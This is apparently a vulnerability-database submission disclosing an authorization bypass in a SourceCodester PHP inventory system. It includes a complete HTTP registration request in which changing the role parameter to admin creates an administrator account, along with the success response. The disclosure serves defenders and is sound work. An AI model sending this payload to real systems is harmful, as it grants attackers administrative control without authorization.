| tiêu đề | SourceCodester Inventory System using PHP and MySQL Source Code 0 Authorization Bypass |
|---|
| Mô tả | During the assessment of the application it was observed that the code developer has missed a very critical path during the account creation. As the application allows to create accounts for the staff, there is a ROLE parameter when set to admin bypasses the restrction and creates the staff account by migrating it to admin.
For example:
POST /Product_Inventory/api/users_handler.php HTTP/1.1
Host: localhost
Content-Length: 84
sec-ch-ua-platform: "macOS"
Accept-Language: en-US,en;q=0.9
sec-ch-ua: "Not-A.Brand";v="24", "Chromium";v="146"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/Product_Inventory/register.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=4k1d9iv3r8rfq72isu5j3utogq
Connection: keep-alive
full_name=fakeadmin&username=fakeadmin&password=fakeadmin&action=register&role=staff // VULNERABLE
Changing the above to the following creates an admin account.
full_name=fakeadmin&username=fakeadmin&password=fakeadmin&action=register&role=admin // VULNERABLE
While the response that is received is 200 and the account is created successfully.
{"success":true,"message":"User registered successfully!"} |
|---|
| Người dùng | Kamran Saifullah (UID 4218) |
|---|
| Đệ trình | 24/05/2026 08:56 (cách đây 16 ngày) |
|---|
| Kiểm duyệt | 07/06/2026 18:01 (14 days later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 369139 [SourceCodester Inventory System 1.0 Account Creation users_handler.php ROLE nâng cao đặc quyền] |
|---|
| điểm | 17 |
|---|